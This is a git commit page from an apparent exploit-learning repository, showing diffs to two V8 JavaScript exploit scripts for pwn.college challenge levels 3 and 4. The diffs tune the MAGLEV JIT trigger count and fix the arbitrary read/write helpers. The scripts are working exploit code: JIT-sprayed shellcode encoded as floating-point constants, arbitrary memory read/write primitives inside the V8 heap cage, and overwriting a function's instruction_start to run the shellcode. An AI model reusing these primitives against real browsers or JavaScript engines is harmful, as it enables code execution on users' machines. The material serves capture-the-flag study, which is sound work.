bjrjk/pwn-learning
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Minor Changes to Level 3 & 4 of PwnCollegeV8Exploitation

Browse Source 
1. The threshold to trigger MAGLEV compilation is different when gdb is attached to d8 or not.
    - When gdb attached to d8, the training loop count to trigger MAGLEV is 100,000.
    - But when the standalone d8 running, the training loop count to trigger MAGLEV is only 10,000. If you still use 100,000, it will trigger TURBOFAN then code data structure will change and shellcode execution fails.
2. Fixed other miscellaneous minor mistakes.
This commit is contained in:
Jack Ren
2024-09-15 08:57:29 +08:00
parent cf1552b522
commit 90245c7091
2 changed files with 10 additions and 12 deletions
Download Patch File Download Diff File Expand all files Collapse all files

11
JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js
View File

@@ -36,7 +36,7 @@ function shellcode() { // Promote to ensure not GC during training
// JIT spray machine code form of `execve("catflag", NULL, NULL)` // JIT spray machine code form of `execve("catflag", NULL, NULL)`
return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61]; return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61];
} }
for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation
// Create a PACKED_DOUBLE_ELEMENTS array contains faked PACKED_DOUBLE_ELEMENTS array // Create a PACKED_DOUBLE_ELEMENTS array contains faked PACKED_DOUBLE_ELEMENTS array
// map, properties, elements, length --- first three field are static roots // map, properties, elements, length --- first three field are static roots
@@ -64,7 +64,7 @@ function ArbWrite64(cage_addr, value) { // int32, bigint
arr[1] = c2f(ptr(cage_addr - 0x8), 0x00008000); arr[1] = c2f(ptr(cage_addr - 0x8), 0x00008000);
let written = b2f(value); let written = b2f(value);
fakearr[0] = written; fakearr[0] = written;
console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${written.toString(16)}`); console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`);
} }
// ArbRead64(0xfffffff0); // ArbRead64(0xfffffff0);
@@ -74,16 +74,17 @@ function ArbWrite64(cage_addr, value) { // int32, bigint
function ArbRead32(cage_addr) { // int32 -> int32 function ArbRead32(cage_addr) { // int32 -> int32
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned"); if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
bi64a[0] = ArbRead64(cage_addr & 0xfffffff8); bi64a[0] = ArbRead64(cage_addr & 0xfffffff8);
let result = si32a[(cage_addr & 0x4) >> 2]; let result = i32a[(cage_addr & 0x4) >> 2];
console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`); console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`);
return result; return result;
} }
// DWORD Aligned
function ArbWrite32(cage_addr, value) { // int32, int32 -> void function ArbWrite32(cage_addr, value) { // int32, int32 -> void
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned"); if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8; let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8;
bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr); bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr);
si32a[(cage_addr & 0x4) >> 2] = value; i32a[(cage_addr & 0x4) >> 2] = value;
ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]); ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]);
console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`); console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`);
} }
@@ -101,5 +102,3 @@ let instruction_start = ArbRead32(instruction_start_addr);
console.log("instruction_start: " + instruction_start.toString(16)); console.log("instruction_start: " + instruction_start.toString(16));
ArbWrite32(instruction_start_addr, instruction_start + 0x6B); ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
shellcode(); shellcode();
// Due to heap fengshui, the possibility of getting flag by running exploit once is 1/10

11
JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js
View File

@@ -35,7 +35,7 @@ function shellcode() { // Promote to ensure not GC during training
// JIT spray machine code form of `execve("catflag", NULL, NULL)` // JIT spray machine code form of `execve("catflag", NULL, NULL)`
return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61]; return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61];
} }
for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation
let placeholder = {}; let placeholder = {};
let corrupt_arr = [2.30234590962020889586281057477E-320]; let corrupt_arr = [2.30234590962020889586281057477E-320];
@@ -85,23 +85,24 @@ function ArbWrite64(cage_addr, value) { // int32, bigint
corrupt_arr[corrupt_arr_0_to_double_arr_element_offset] = c2f(ptr(cage_addr - 0x8), 0x00000002); corrupt_arr[corrupt_arr_0_to_double_arr_element_offset] = c2f(ptr(cage_addr - 0x8), 0x00000002);
let written = b2f(value); let written = b2f(value);
double_arr[0] = written; double_arr[0] = written;
console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${written.toString(16)}`); console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`);
} }
// DWORD Aligned // DWORD Aligned
function ArbRead32(cage_addr) { // int32 -> int32 function ArbRead32(cage_addr) { // int32 -> int32
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned"); if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
bi64a[0] = ArbRead64(cage_addr & 0xfffffff8); bi64a[0] = ArbRead64(cage_addr & 0xfffffff8);
let result = si32a[(cage_addr & 0x4) >> 2]; let result = i32a[(cage_addr & 0x4) >> 2];
console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`); console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`);
return result; return result;
} }
// DWORD Aligned
function ArbWrite32(cage_addr, value) { // int32, int32 -> void function ArbWrite32(cage_addr, value) { // int32, int32 -> void
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned"); if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8; let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8;
bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr); bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr);
si32a[(cage_addr & 0x4) >> 2] = value; i32a[(cage_addr & 0x4) >> 2] = value;
ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]); ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]);
console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`); console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`);
} }
@@ -115,5 +116,3 @@ let instruction_start = ArbRead32(instruction_start_addr);
console.log("instruction_start: " + instruction_start.toString(16)); console.log("instruction_start: " + instruction_start.toString(16));
ArbWrite32(instruction_start_addr, instruction_start + 0x6B); ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
shellcode(); shellcode();
// the possibility of getting flag by running exploit once is 1/10